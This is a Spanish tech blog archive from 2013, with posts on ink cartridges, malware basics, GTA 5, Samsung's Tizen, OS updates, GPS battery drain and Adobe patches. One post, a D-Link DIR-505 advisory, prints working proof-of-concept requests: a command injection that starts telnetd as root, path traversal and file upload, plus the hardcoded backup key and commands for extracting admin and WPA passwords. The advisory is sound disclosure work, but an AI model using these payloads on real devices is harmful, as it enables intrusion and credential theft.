jueves, 19 de septiembre de 2013

La tecnología detrás de los cartuchos HP.

La tecnología detrás de los cartuchos HP.
 
 
Ya con anterioridad he comentado sobre la recarga de cartuchos o la instalación de sistemas continuos de tinta en las impresoras. En ambos casos siempre me he referido al ahorro de dinero a nivel de usuarios domésticos, siempre he dicho que la calidad de la impresión por nada del mundo será igual ya que es de lógica suponer que si una empresa ha invertido millones de dólares y años en desarrollar una tinta especial para sus impresoras, jamás ni nunca una tinta genérica podrá ofrecer igual calidad de impresión.
 
Para que tengan una mejor idea de lo que está detrás de cada cartucho de tinta, les pongo de ejemplo un evento reciente promovido por la división de HP en España, donde se explica paso a paso la tecnología que hay detrás de cada uno de sus cartuchos.
 
La división de HP en España ha celebrado un evento especial donde uno de sus mayores especialistas en impresión, Thom Brown, investigador de tinta en los laboratorios que tiene la compañía en Estados Unidos, nos ha demostrado en profundidad toda la tecnología e innovación necesaria para dar como resultado que los cartuchos de tinta HP sean de una calidad óptima de cara al consumidor.

Durante la primera parte del evento, Thom Brown se centró en explicarnos como se repartía la tinta sobre la superficie. El proceso, aunque complejo, tiene una sencilla explicación. Todas las impresiones actuales se basan en el arte del puntillismo, si miramos una fotografía o documento bajo un cristal de gran aumento nos daremos cuenta de que todo son puntos. La impresora realiza un mapeado en cuadrícula de un tamaño imperceptible para el ojo humano de toda la superficie del papel. Una vez realizada la cuadrícula, la tecnología de impresión dispara desde las boquillas de los cartuchos, que tienen el grosor de una tercera parte del cabello humano, más de 35 millones de gotas de tinta cuya unidad de medida es el picolitro.

HP nos demostró a cámara súper lenta como sus impresoras calientan la tinta mediante un chip de silicio hasta los 300 grados en cuestión de milisegundos para así aprovechar la energía generada y antes de que la gota comience a hervir, dispararla contra la superficie a una velocidad de 50 kilómetros por hora.

En la segunda parte del evento, el protagonismo pasaba de la tinta al cartucho. HP nos mostró de cerca como eran sus nuevos cartuchos múltiples a tamaño completo. A mediados del pasado mes de abril asistimos a la presentación de la HP Officejet Pro X, certificada por el Libro Guinness de los Récords como la impresora mas rápida del mundo. Esta impresora, capaz de realizar 70 copias de página por minuto, alberga en su interior la nueva generación de cartuchos múltiples de HP. El motivo por el cual estos cartuchos múltiples logran imprimir a velocidades de vértigo es que al ser del mismo o más tamaño que una hoja de papel, la impresora no necesita realizar el proceso de mapeado y directamente lanza los chorros de tinta simultáneamente entre sus 10 cartuchos.

En la parte final del evento la compañía intento resolver nuestras dudas sobre porqué sus productos eran tan caros en el mercado. A parte de toda la innovación, que tiene su precio, mostrada por HP a lo largo de la mañana, los responsables de la compañía nos comentaron que se necesitan entre 3-5 años con más de 1.000 prototipos para que sus matemáticos logren crear nuevos compuestos. La tinta de HP no es solo agua de con color, a diferencia de las tintas de relleno usadas por compañías más baratas.
En la fórmula secreta de HP para la creación de sus tintas se añaden aglutinantes o polímeros a parte de otra decena de elementos en diversas cantidades para lograr un resultado óptimo. Lograr que las millones de gotas de tinta no se mezclen unas con otras, que el papel no se embarquille, no aparezca el efecto fading con el paso de los años o que el color sea vivo, tiene también su precio.

La compañía comentó sin pelos en la lengua que sus competidores con cartuchos de tinta re manufacturados de bajos precios podrían hacer perfectamente ingeniería inversa para encontrar cual era la fórmula original de sus tintas, pero debido al alto costo que esta investigación les supondría, prefieren seguir vendido al consumidor cartuchos de baja calidad. Los ejemplos reales que nos mostraron los responsables de HP no dejan lugar a duda sobre la diferencia de calidad con otros competidores.

Si bien pienso tras ver toda la tecnología e innovación detrás del proceso de creación de los cartuchos de tinta HP que para imprimir documentos tradicionales u hojas informativas, que representan la gran parte de nuestras impresiones, no es necesario comprar cartuchos de alta calidad, si que opino que si tenemos que imprimir alguna fotografía o documento especial que queramos guardar durante mucho tiempo, vale la pena gastarse algo más de dinero (desde los 10 hasta prácticamente los 90 euros dependiendo del modelo) para conseguir resultados óptimos.
 
 

miércoles, 18 de septiembre de 2013

Las preguntas más frecuentes sobre el malware, ¿qué es, quiénes lo crean y cómo protegernos?.

Las preguntas más frecuentes sobre el malware, ¿qué es, quiénes lo crean y cómo protegernos?.

malware%20dreamstime-virus_1

Con frecuencia escribo sobre los peligros del malware en la actualidad y frecuentemente escucho a conocidos y no conocidos, profesionales y no profesionales hablar sobre el malware y frecuentemente sigo escuchando el mito sobre las casas de software antimalware, las cuales son las que crean los virus para así vender sus productos, también veo que muchos desconocen en realidad que son los malware y mucho más como defenderse de ellos por lo que aclarar los conceptos es crucial para entender de que se trata esta amenaza.

Cada vez con más frecuencia recibimos avisos, incluso desde los medios de comunicación generalistas, sobre algún nuevo tipo de malware cuya infección puede crear serios problemas de seguridad en las víctimas. La mayoría de estas amenazas son infecciones por malware moderno, también denominadas APTs (Advanced Persistent Threats, amenazas persistentes avanzadas). ¿Qué hay realmente detrás de una infección por malware moderno? ¿quiénes son los responsables de su creación y propagación, que las hacen tan “populares”? ¿qué podemos hacer para protegernos?

La verdad es que la respuesta a cualquiera de esas preguntas no es simple. Para entender mejor su complejidad probablemente lo primero que debemos aclarar es qué entendemos por malware moderno. Podemos encontrar múltiples definiciones al respecto, con matices diferentes, pero lo que siempre es común es el objetivo: cuando hablamos de malware moderno hablamos de ataques focalizados en el usuario. Es posible que el objetivo final sea el propio usuario, para robarle por ejemplo sus tarjetas de crédito, o puede ser que el usuario final no sea más que un medio para alcanzar un fin superior, como secretos industriales ubicados en un servidor del datacenter. En este segundo caso el usuario es atacado en el supuesto, en muchas ocasiones acertado, de que las políticas de seguridad internas son más laxas y que por tanto será más sencillo para el atacante acceder a ese recurso desde el interior, en lugar de hacerlo directamente desde fuera.

También es interesante analizar las diferentes fases que normalmente tienen lugar en una infección por malware moderno y que en general son: cebo al usuario, explotación, instalación del malware, conexión inversa y robo. Durante la fase de cebo se suele utilizar la ingeniería social, pretendiendo engañar al usuario para que visite alguna URL, o para que abra algún documento que se le hace llegar. Los mecanismos de envío del cebo son múltiples, yendo desde el correo electrónico hasta las redes sociales. Durante la fase de explotación es cuando se abusa de alguna vulnerabilidad para ganar el control del equipo del cliente. Puesto que hablamos de ataques a usuarios finales, normalmente se explota la herramienta que más utilizan estos, es decir, los navegadores web y sus plugins. Si la vulnerabilidad es desconocida (zero day o día cero) tendrá aún más probabilidades de éxito, aunque el hecho de que no lo sea tampoco la invalida puesto que es fácil encontrar sistemas sin parchear. Una vez conseguido el acceso al equipo el atacante quiere hacerlo perdurable. Es por ello que en la tercera fase del ataque realiza normalmente la instalación de algún “cliente” que une el sistema atacado automáticamente a la botnet. Esta descarga del malware y su instalación tiene lugar sin que el usuario perciba nada, a través de un proceso conocido como drive-by download (descarga dirigida). Una vez que el malware ha sido instalado silenciosamente tiene lugar la cuarta fase, que hemos denominada conexión inversa, en la que el cliente de la botnet intenta contactar con los servidores de mando y control (C&C) iniciando para ello una conexión hacia Internet. Esta comunicación utiliza normalmente tácticas evasivas y de ocultación (conexiones cifradas, fragmentadas a través de redes P2P…) y son las que perpetúan el acceso para llegar finalmente a la quinta fase, en la que los atacantes pueden explorar y robar a su antojo.


En cuanto a quiénes están detrás de la creación de una infección por malware moderno, de nuevo la respuesta no es única: dependiendo del tipo de malware y su objetivo los actores que están por detrás varían. Podemos establecer una clasificación muy generalista dividiendo a los responsables en tres grandes grupos, por orden creciente de sofisticación: activistas, ciber-crimen organizado y estados-nación. Los activistas suelen estar compuestos por algunos miembros con conocimientos técnicos que desarrollan las técnicas y herramientas para realizar los robos y sabotajes. El resto de los miembros es altamente heterogéneo y su motivación suele ser de tipo “sentimental” o política. Atacan un determinado objetivo porque consideran que es apropiado para hacer “justicia”. Un buen ejemplo de este tipo de organizaciones son Anonymous o Lulzsec. En el segundo grupo, el del ciber-crimen organizado, tendríamos las organizaciones criminales cuyo fin es claramente lucrarse y que contienen una estructura altamente especializada (expertos en phising, drive-by downloads, carders, …). Un ejemplo en este área sería la organización criminal detrás del “virus de la Policía”, que monetizaban el ataque consiguiendo transferencias para desbloquear los sistemas de las víctimas, amenazadas porque supuestamente habían visitado webs ilícitas y cuyo PC estaba por ello bloqueado por la Policía.  Recientemente han detenido a la parte de la organización dedicada al blanqueo de dinero, con unos ingresos estimados entorno al millón de euros por año. Por último tenemos los estados-nación, con el máximo nivel de complejidad y recursos, por lo que son capaces de crear las amenazas más potentes y peligrosas con diversos objetivos (político, espionaje industrial, militar, …). Algunos ejemplos de malware en este área son Stuxnet, Duqu y The Flame.

Finalmente y respecto a los mecanismos de defensa, la semana pasada organizamos un taller técnico sobre malware moderno desde Palo Alto Networks con un alto grado de participación (más de 120 asistentes) y las conclusiones son parejas al problema: no existe una solución individual, sino que es necesario realizar una aproximación multidisciplinar. Así pues es necesario educar a los usuarios en la necesidad de que rechacen aquellos contenidos que desconocen, es necesario que las soluciones de seguridad controlen las aplicaciones y no solamente los puertos TCP/UDP, para reducir la superficie de ataque y dejar menos espacio a los vectores de propagación. Hay que inspeccionar también el tráfico cifrado, lo que no se ve no puede protegerse. Es necesario contar con sistemas de prevención de amenazas, capaces de detectar y detener los intentos de explotación conocidos. También es importante asumir que es posible que la infección entre por alguna vía en la red y que, por tanto, también hay que ser capaz de detectar máquinas infectadas a través del análisis de las conexiones contra los servidores de C&C de la botnet. Finalmente, y para el malware desconocido, nuestras soluciones proponen analizar los ficheros sospechosos en tiempo real, en una sandbox segura para los clientes que Palo Alto Networks alberga. Aquí permitimos al malware expresarse libremente para analizar su comportamiento y, en caso de que sea maligno, generar mecanismos de protección contra la infección y el tráfico de C&C que distribuimos a todos los cortafuegos de nuestros clientes. De este modo obtienen protección en menos de una hora desde que se detectó el fichero, lo que resulta crítico para prevenir la infección y propagación frente a un análisis que pueda requerir días para conseguir la protección.

Categorías de malware
Como verán a continuación, existen varias categorías y sub categorías por lo que se pude deducir que el malware moderno ha evolucionado al punto que se ha vuelto muy especifico en cuanto a su modo de ataque, su objetivo y el grupo de usuarios al cual está dirigido:
  1. Infeccioso:
    1. Virus.
    2. Gusanos.
  2. Ocultos:
    1. Backdoors o puertas traseras.
    2. Drive-by Downloads.
    3. Rootkits.
    4. Troyanos o Caballos de Troya.
  3. Para obtener algún provecho:
    1. Mostrar publicidad:
      1. Spyware o programa espía.
      2. Adware.
      3. Hijacking.
    2. Robar información personal:
      1. Keyloggers.
      2. Stealers.
    3. Realizar llamadas:
      1. Dialers.
    4. Ataques distribuidos:
      1. Botnets.
    5. Otros:
      1. Rogue software.
      2. Ransomware.
Por lo general la mayoría del malware está diseñado para obtener algún beneficio económico, pero en los últimos años se han detectado un nuevo tipo de malware diseñado para sabotear infraestructura especifica que hace pensar que los ataques forman parte de una ciberguerra mundial de la cual he hablado con anterioridad y que lleva años en progreso.
 

Rockstar Games hace una recomendación para mejorar el desempeño de GTA 5 en las Xbox 360.

Rockstar Games hace una recomendación para mejorar el desempeño de GTA 5 en las Xbox 360.
 
 
Aunque el lanzamiento de Grand Theft Auto V estaba fechada para este martes, 17 de septiembre, varias tiendas alrededor del mundo prestaron oídos sordos al embargo y comenzaron a vender copias del juego de manera prematura. Así que si eres uno de los afortunados que ya tiene el juego en las manos en su versión para Xbox 360, Rockstar Games tiene una recomendación para ti.
 
La medida está encaminada a optimizar el desempeño del juego
En un mensaje dentro de la cuenta de Twitter del estudio, el equipo de Rockstar Support sugiere que para tener “un desempeño óptimo” del juego, “les recomendamos no instalar” el disco donde se encuentra el juego. De igual forma, avisan que compartirán más información sobre el tema apenas llegue el título a las vitrinas de manera oficial.
La versión de Grand Theft Auto V para la Xbox 360 llegará en dos discos. El primero comprende una instalación obligatoria de 8GB, mientras que el segundo trae consigo el juego completo.
Así que ya lo saben. Si quieren que su juego corra sin ningún tipo de problemas en su Xbox 360, eviten instalar el disco que contiene el juego. Estaremos atentos a nueva información que Rockstar Games pueda compartir al respecto.
Video 
 
 
Más información:
 
 

martes, 17 de septiembre de 2013

Múltiples vulnerabilidades en el router wireless D-Link DIR-505

Múltiples vulnerabilidades en el router wireless D-Link DIR-505

Se han publicado seis vulnerabilidades que afectan al dispositivo D-Link DIR-505 Wireless Router. Los problemas podrían permitir la revelación de información sensible, inyección de comandos, acceder a los ficheros del dispositivo, elevar privilegios y eludir restricciones de seguridad.

D-Link DIR-505 Wireless Router es un dispositivo portátil y de fácil manejo pensado para llevar de viaje y ampliar el alcance de cualquier red cableada mediante la creación de una red Wifi.

Alessandro Di Pinto ha descubierto múltiples errores de seguridad en los dispositivos D-Link DIR-500 que podrían ser aprovechados por un atacante en la misma red local. Son los siguientes:

* un error de falta de comprobación del parámetro de entrada 'ip_addr' proporcionado por el usuario en la utilidad 'Ping Test' de la página '/System_Check.htm' podría ser aprovechada por un atacante autenticado para ejecutar comandos arbitrarios con privilegios de root. Se propone la siguiente prueba de concepto que permitiría iniciar el demonio de telnet en el dispositivo:

POST /my_cgi.cgi HTTP/1.1
Host: <DIRECCION-IP>
Cookie: uid=<COOKIE-VALIDA>
Content-Length: 55

request=ping_test&ip_addr=127.0.0.1; /usr/sbin/telnetd;

* existe una vulnerabilidad de escalada de directorios en la interfaz web del puerto 8181 para explorar el contenido de una unidad USB conectada al dispositivo podría permitir a un atacante autenticado acceder a todos los ficheros del sistema. La siguiente PoC permitiría el acceso al directorio /etc:

http://<DIRECCION-IP>:8181/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc

* otra vulnerabilidad de escalada de directorios relacionada con el parámetro 'path' de la utilidad '/dws/api/UploadFile' permitiría a un atacante autenticado subir un fichero desde una unidad USB conectada a un directorio arbitrario del dispositivo. Prueba de concepto para subir un fichero de texto al directorio /tmp

POST /dws/api/UploadFile?0.35494315220771677 HTTP/1.1
Host: <DIRECCION-IP>:8181
Cookie: uid=<COOKIE-VALIDA>
Content-Type: multipart/form-data;
boundary=---------------------------736034324104825609817274318
Content-Length: 1179

  - -----------------------------736034324104825609817274318
Content-Disposition: form-data; name="id"

admin
- -----------------------------736034324104825609817274318
Content-Disposition: form-data; name="tok"

- -----------------------------736034324104825609817274318
Content-Disposition: form-data; name="volid"

1
- -----------------------------736034324104825609817274318
Content-Disposition: form-data; name="path"

usb_dev/usb_A1/../../../../../../../../../tmp/
- -----------------------------736034324104825609817274318
Content-Disposition: form-data; name="filename"

exploit.txt
- -----------------------------736034324104825609817274318
Content-Disposition: form-data; name="upload_file"; filename="test.txt"
Content-Type: text/plain

malicious text
- -----------------------------736034324104825609817274318--

* una falta de comprobación de permisos de usuario permitiría elevar privilegios utilizando una cookie válida generada por el usuario invitado (user: guest, password: guest). Se podría utilizar dicha cookie para explotar las vulnerabilidades anteriores a pesar de que dicho usuario no tiene permisos para ejecutar acciones como subir ficheros al dispositivo.

* un error de falta de comprobación de autenticación en 'my_cgi.cgi' al procesa peticiones HTTP 'multipart/form-data' podría permitir eludir restricciones de seguridad y acceder a funcionalidades del dispositivo sin necesidad de autenticación. Como prueba de esta vulnerabilidad se presenta una PoC que permitiría a un atacante sin autenticar cargar un fichero de configuración en el dispositivo:

POST /my_cgi.cgi HTTP/1.1
Host: <DIRECCION-IP>
Cookie: uid=<COOKIE-VALIDA>
Content-Type: multipart/form-data;
boundary=---------------------------4318828241986447042487864450
Content-Length: 382

- -----------------------------4318828241986447042487864450
Content-Disposition: form-data; name="which_action"

load_conf
- -----------------------------4318828241986447042487864450
Content-Disposition: form-data; name="file";
filename="attacker-config.bin"
Content-Type: text/plain

<NUEVA-CONFIGURACIOM-PARA-EL-DISPOSITIVO>
- -----------------------------4318828241986447042487864450--

* el fichero de copia de seguridad de la configuración del dispositivo es encriptado de forma débil con la contraseña 'sw5-superman' y se conoce que tiene una cabecera de 84 bytes. Un atacante podría crear su propio fichero de configuración encriptando las entradas con dicha clave y creando una cabecera con la utilidad 'imghdr' y subirlo al dispositivo a través de la vulnerabilidad anteriormente descrita para eludir restricciones. También podría obtener el fichero del dispositivo y descubrir información sensible (como la contraseña de administrador o la clave WPA) a través de los siguientes comandos:

# Eliminar los 84 bytes de cabecera
dd if=config-file of=config-file-no-header bs=84 skip=1
# Desencriptar el contenido
ccrypt -d -K sw5-superman config-file-no-header

Las vulnerabilidades afectan al dispositivo D-Link DIR-505 Wireless Router con firmware 1.06, aunque otras versiones anteriores y otros dispositivos también podrían estar comprometidos.

D-Link ha publicado una actualización de firmware (1.07) en su página web y FTP oficial, que corrige los errores anteriormente expuestos.

Más información:

Multiple vulnerabilities on D-Link Dir-505 devices
http://www.artificialstudios.org/alessandro.dipinto/advisories/20130909-dlink-dir505.txt

ftp://ftp.dlink.com/Gateway/dir505/Firmware/dir505_fw_107.zip

Samsung apuesta a Tizen para el 2014.

Samsung apuesta a Tizen para el 2014.
 

 
El mundo de la tecnología es muy vertiginoso y los smartphone no son la excepción, muchas empresas ya están haciendo sus movidas a fin de posicionarse en la cima, el futuro de Blackberry no es muy claro y ahora Microsoft compra a Nokia para entrar de lleno en el mundo de los smartphone son cosas que hacen que algunos otros se replanteen sus opciones dentro del mercado. Ya Samsung ha anunciado para el 2014 la salida de sus televisores inteligentes con Tizen pero al parecer la cosa va más allá y los rumores apuntan a que reemplazará Android por Tizen en su Galaxy S5.

¿Samsung planea dejar Android?
El Samsung Galaxy S5 será otro terminal en la popular línea de smartphones de Samsung y está previsto que aparezca el próximo año como sucesor del Samsung Galaxy S4. Si alguien nos dijera que el nuevo teléfono buque insignia de Samsung podría aparecer en el mercado sin Android todos pensaríamos que está loco. Sin embargo, un nuevo informe sugiere que no es imposible que el Samsung Galaxy S5 aparezca en el mercado con Tizen en lugar de Android.
Como muchos saben, Tizen es un nuevo sistema operativo para móviles basado en un sistema de código abierto Linux. Compañías como Samsung, Intel y otros están apoyando el desarrollo de Tizen y algunas de sus principales características son similares a Android.

Hay esperanzas de que Tizen podría convertirse en el tercer sistema operativo después de Android y iOS, pero esto dependerá en gran medida el apoyo continuo de los fabricantes, sobre todo de Samsung. Mucho se ha especulado sobre si existe espacio en el mercado para otro sistema operativo móvil y de hecho parece que Samsung que ha retrasado la salida de su primer terminal con Tizen, piensa que ese espacio en el mercado es pequeño.

Esta actitud de Samsung ha dado lugar a algunas dudas respecto a la posición de Samsung con respecto a Tizen, siendo Samsung una compañía tan ligada a Android. Sin embargo, ya se ha especulado en más de una ocasión que Google podría restringir Android para su propio uso con Motorola como principal beneficiario de este hipotético movimiento por parte de Google. Aunque Google ha negado esto muchas veces, puede darse el caso de que Samsung quiera tener una alternativa preparada a Android en caso de que las cosas cambiasen.

También ha habido conjeturas de que el sistema operativo Tizen sólo se utilizará para los dispositivos de Samsung en la gana baja o a o sumo media. La idea de un Samsung Galaxy S o dispositivo Samsung Galaxy Note sin Android parece casi ridícula.
Sin embargo, esta idea puede no ser tan descabellada como lo parece a simple vista. Ya vimos como Samsung evitó en todo lo que pudo la mínima referencia a Android en la prestación del Samsung Galaxy S4.

El co-CEO de Samsung Boo-Keun Yoon habló recientemente sobre los planes de la compañía para Tizen como sistema usado para conectar todos los productos de la compañía, incluidos los smartphones. Esta es una declaración muy provocadora y deja muy a las claras la intención, más o menos cercana en el tiempo, de distanciarse de Android por parte de Samsung.

Ciertamente, nos parece poco probable que Samsung se lance a la piscina con un terminal tan importante como va a ser el Samsung Galaxy S5. Sin embargo sí que parece más posible que el nuevo terminal de Samsung para el año que viene pudiera aparecer en dos versiones, una con Android y otra con Tizen.

Parece que este nuevo terminal se va a lanzar en torno a marzo o abril del próximo año.
¿Puedes imaginar un escenario en el que Samsung podría lanzar un Samsung Galaxy S5 sin Android? O crees que es más posible un Samsung Galaxy S5 con dos versiones?

¿El color rosa existe o es una percepción de nuestro cerebro?.

¿El color rosa existe o es una percepción de nuestro cerebro?.
 
 
Los científicos parecen estar de acuerdo que este color no forma parte de la región del espectro electromagnético. En otras palabras, ningún objeto natural o artificial del mundo, ni siquiera los flamencos, “emite luz rosa”. Cuando nuestro cerebro percibe esta tonalidad, lo que detecta en realidad es la combinación de dos colores, el rojo y el violeta, que están situados en extremos opuestos del arcoíris.

No obstante, negar su existencia tampoco parece ser totalmente correcto. Jill Morton, profesor de la Universidad de Hawái, asegura que si bien el rosa no es una parte del espectro de luz sí existe como la suma de otros colores.
 
En el siguiente video, se explica gráficamente el fenómeno: http://www.youtube.com/watch?feature=player_embedded&v=S9dqJRyk0YM
 
Video
 

domingo, 15 de septiembre de 2013

Apple corrige varias vulnerabilidades con la versión 10.8.5 de OS X.

Apple corrige varias vulnerabilidades con la versión 10.8.5 de OS X.
Apple ha publicado una actualización de seguridad para su familia de sistemas operativos OS X junto a la nueva versión 10.8.5 del sistema. Entre otras mejoras, soluciona un total de 31 vulnerabilidades en varios de sus componentes. También se han actualizado los certificados raíz.

La actualización, publicada bajo el título de Security Update 2013-004, está disponible para los sistemas Mac OS X y Lion, ambos con sus correspondientes versiones de servidor, y Mountain Lion. Se han solucionado vulnerabilidades en Apache, Bind, ClamAV, CoreGraphics, ImageIO, Installer, IPSec, Kernel, Mobile Device Management, OpenSSL, PHP, PostgreSQL, Power Management, QuickTime, Screen Lock y sudo.

Con esta actualizaión Apple también ha anunciado una actualización de los certificados raíz, se han añadido y eliminado múltiples certificados de la lista de sistemas raíz. La lista completa de sistemas raíz puede visualizarse a través de la aplicación Keychain Access.

Por último se señala la corrección de un problema con determinadas cadenas Unicode que podría provocar el cierre inesperado de aplicaciones.

La actualización puede descargarse a través de la opción de Software Update o desde Apple Downloads.

Más información:

About the security content of OS X Mountain Lion v10.8.5 and Security Update 2013-004
http://support.apple.com/kb/HT5880

sábado, 14 de septiembre de 2013

Errores al actualizar Windows 7, 8 y 8.1.

Errores al actualizar Windows 7, 8 y 8.1.
 
microsoft_windows-update

Aunque es altamente recomendable mantener nuestros sistemas operativos actualizados, no es menos cierto que en ocasiones los resultados no son lo esperado. Hace poco comentaba sobre los nuevos boletines de seguridad de Microsoft correspondientes al segundo martes de septiembre. Con ellos solucionaban bastantes errores críticos de ejecución de código remoto y fallos que podrían permitir el robo de datos y ganar permisos dentro de un sistema. Las mejoras de seguridad son siempre bienvenidas, pero, al igual que los meses anteriores, están generando varios problemas a los usuarios.

A diferencia de lo ocurrido en los meses anteriores, estos errores no perjudican al usuario. Los meses pasados, varias actualizaciones impedían a los usuarios jugar a determinados juegos al recibir errores gráficos debido a una actualización. Otra de ellas generaba pantallazos azules en el sistema que quedaba, tras la instalación, inestable.

Errores registrados en Windows 7

A los usuarios de Windows 7 (y algunos usuarios con Windows Vista también reportan fallos), las actualizaciones que están causando problemas son las correspondientes a las nomenclaturas KB2760411, KB2760588 y KB2760583. Estas actualizaciones se instalan en el sistema pero no quedan registradas, por lo que Windows Update sigue pidiendo al usuario que las instale de nuevo. Según afirma un usuario en los foros de Microsoft, bastaría con ocultar las actualizaciones para que Windows no pida instalarlas de nuevo, pues las instalaciones se instalan correctamente.

Errores registrados en Windows 8 y Windows 8.1
Los errores que se están generando bajo estos sistemas son algo más graves. Las actualizaciones nombradas bajo la nomenclatura KB2810009 y KB2817630. Estas actualizaciones causan errores relacionados con los temas de Windows, carpetas vacías e imposibilita el acceso a las cuentas de correo de Outlook. Por el momento, la única forma de solucionar este error es desinstalando las actualizaciones maliciosas.
Para ello debemos ir al ”Panel de Control”, hacer click en “Programas y características” y luego en “Ver actualizaciones instaladas”. Buscaremos las actualizaciones KB2810009 y KB2817630, marcamos ambas actualizaciones y pulsaremos el botón “Desinstalar”. Una vez reiniciado el sistema, todo debería funcionar sin problemas de nuevo.
Windows_8_Error_Outlook:septiembre

Algunos usuarios de Windows XP también reportan fallos con las últimas actualizaciones. No son los mejores días para las actualizaciones de Microsoft, ya que los 3 últimos boletines han causado determinados problemas, de los cuales, aún hay varios sin solucionar.
También debemos de destacar que estos fallos no afectan a todos los usuarios, sino que únicamente afectan a los usuarios con una configuración determinada, aunque aún no se conoce qué tipo de configuración causa estos errores.

¿Has sufrido alguno de los problemas con las actualizaciones de Windows?.
 
Más información:
 

viernes, 13 de septiembre de 2013

¿Por qué el GPS consume tanta batería del smartphone?.

¿Por qué el GPS consume tanta batería del smartphone?.

¿Por qué el GPS consume toda la batería del smartphone?
  • Una conexión GPS exige intercambiar datos a baja velocidad con tres o cuatro satélites situados en la órbita terrestre
  • Durante el proceso, el smartphone o la tablet no pueden entrar en el modo de bajo consumo
  • Algunas aplicaciones, como Google Maps, usan trucos para reducir el drenaje de la batería
Cualquiera que haya realizado alguna vez una conexión GPS desde un dispositivo portátil que no esté conectado a la corriente eléctrica, sabe que el proceso consume una gran cantidad de batería, especialmente si se usa de forma continuada. De todas las funciones asociadas con antenas o sensores que pueden llevar a cabo un smartphone o una tablet, el uso del GPS es la que más batería consume.
El sistema GPS, desarrollado por el Departamento de Defensa de Estados Unidos (aunque ahora tiene usos civiles) consta de 24 satélites situados a 20 kilómetros sobre nuestras cabezas, que orbitan de forma coordinada para cubrir toda la superficie de planeta. Cuando un dispositivo GPS quiere calcular una posición, se conecta con al menos tres satélites, que envían su identificación y la hora de reloj. Calculando el tiempo que tarda en llegar la señal a cada uno de los tres satélites, mediante triangulación, se obtiene la posición exacta del dispositivo GPS, con un margen de error de unos pocos metros. Este margen se puede reducir a unos centímetros si se usa un GPS diferencial.
¿Por que consume tanta batería este servicio?
¿Muchos se habrán preguntado cual es la razón de que este proceso consuma más batería que otros servicios que también requieren usar una antena para conectarse vía satélite?. La razón es que el canal de comunicación entre el dispositivo GPS y los satélites funciona a una velocidad muy lenta, 50 bits por segundo. Durante todo el proceso es necesario alimentar la antena para que no pierda la señal. Por la misma razón, el smartphone o la tablet no pueden entrar en modo Sleep (reposo, o ahorro de energía) así que permanecen en modo de máximo consumo durante todo el tiempo.
El mayor consumo de batería se produce durante la fase en la que se establece la conexión con los satélites. Por tanto, en lugar de cortar una conexión para volver luego, quizá te salga más a cuenta mantenerla activada si la vas a usar en breve.
El estándar A-GPS (GPS asistido) mejora este proceso, acelerándolo, porque puede gestionar los mensajes de comunicación del GPS a través de la conexión 3G o WiFi de tu smartphone, en lugar del canal GPS que, como hemos comentado, sólo funciona a 50 bps.
La conclusión de toda esta teoría es que, si quieres mantener alta la batería de tu smartphone o tablet el mayor tiempo posible, utiliza el GPS sólo cuando sea estrictamente necesario. ¡Nada de ponerse a jugar con él!
Para completar esta interesante información, te recomiendo las siguientes App que a mi parecer son los cinco mejores navegadores GPS para tu smartphone o tablet:
1.- Google Maps
Google Maps 
Uno de los grandes de la cartografía digital. Google Maps se ha convertido en casi imprescindible en cualquier smartphone. Gracias a su complejo sistema de mapas se ha convertido en la base de muchos otros navegadores. Su único inconveniente es la gran dependencia de una conexión de datos para actualizar sus rutas, ya que en nuestro país todavía no se han habilitado las funciones de navegación off-line, como sí permite en otros países. Disponible para Android e iOS.
 
2.- Sygic
 
 
 
Sygic es uno de los navegadores más veteranos en el ámbito de los dispositivos móviles. Resulta el complemento ideal para el conductor, gracias a sus ayudas en pantalla. Un ejemplo de ello es su ayuda dinámica para elegir el carril por el que circular o la visualización de apoyo para las salidas de vías rápidas. Pese a su elevado precio es una apuesta segura, por la calidad de los servicios que ofrece. Disponible para Android e iOS.
 
3.- TomTom
TomTom 
Hablar de navegadores GPS, implica irremediablemente hablar de TomTom. El navegador GPS por excelencia, que ofrece en su versión para smartphones la misma versión de software que para sus dispositivos GPS especializados. Su gran fuerte son las actualizaciones constantes que se realizan desde la firma, y su actualizada base de datos de radares. Tal vez el principal inconveniente sea su elevado precio, bastante por encima de sus rivales. Disponible para Android e iOS
 
4.- Route 66
 
Para muchos un auténtico desconocido, pero no por ello es menos eficiente. Combina modos de navegación on-line y off-line para ofrecer datos actualizados con el menor consumo de datos posible, pudiendo establecer una gran cantidad de detalles para que muestre exactamente la mejor ruta. Pero uno de las características más llamativas (y divertidas) es su vista de navegación Follow Me. En ella se hace uso de la cámara de tu dispositivo para indicarte la ruta directamente sobre la imagen real. Disponible para Android e iOS
5.- Waze
Waze 
Waze se basa en un concepto realmente innovador. Un navegador GPS colaborativo, en el que sus propios usuarios informan de incidencias de tráfico u otros factores importantes, para que la app ofrezca las mejores rutas en cada momento. Por lo tanto, se trata de una app que está en continua evolución y que, en función de las incidencias reportadas por los usuarios de tu zona, modificará diariamente (o no) la ruta hasta tu trabajo o hasta tu casa. Disponible para Android e iOS

 

jueves, 12 de septiembre de 2013

Adobe publica b oletines de seguridad que corrigen 14 vulnerabilidades en sus productos.

Adobe publica b
oletines de seguridad que corrigen 14 vulnerabilidades en sus productos.

logo adobe
 
Adobe ha publicado tres boletines de seguridad en los que ha corregido un total de catorce vulnerabilidades en sus productos Flash Player, Reader, Acrobat, y Shockwave Player.

A continuación se exponen los boletines publicados para cada producto:

* Adobe Flash Player y Adobe AIR (APSB13-21): boletín que soluciona cuatro vulnerabilidades en el popular reproductor flash que podrían causar una corrupción de memoria y permitir que un atacante remoto ejecute código arbitrario a través de un fichero flash especialmente diseñado (CVE-2013-3361, CVE-2013-3362, CVE-2013-3363 y CVE-2013-5324).

* Adobe Reader y Acrobat (APSB13-22): corrige ocho vulnerabilidades que permitirían la ejecución de código remoto debido a desbordamientos y corrupciones de memoria (identificadores del CVE-2013-3351 al CVE-2013-3356), y a errores de desbordamiento de enteros (CVE-2013-3357 y CVE-2013-3358).

* Adobe Shockwave Player (APSB13-23): este último boletín solventa dos errores de seguridad que también podrían permitir la ejecución remota de código (CVE-2013-3359 y CVE-2013-3360).

Se encuentran afectadas las siguientes versiones de los producto Adobe (y anteriores):

* Adobe Flash Player 11.8.800.9x para los sistemas operativos Windows y Macintosh, e incluidas en los navegadores Google Chrome e Internet Explorer 10
* Adobe Flash Player 11.2.202.297 para Linux
* Adobe Flash Player 11.1.115.69 para Android 4.x
* Adobe Flash Player 11.1.111.64 para Android 3.x and 2.x
* Adobe AIR 3.8.0.xxx para Windows, Macintosh y Android
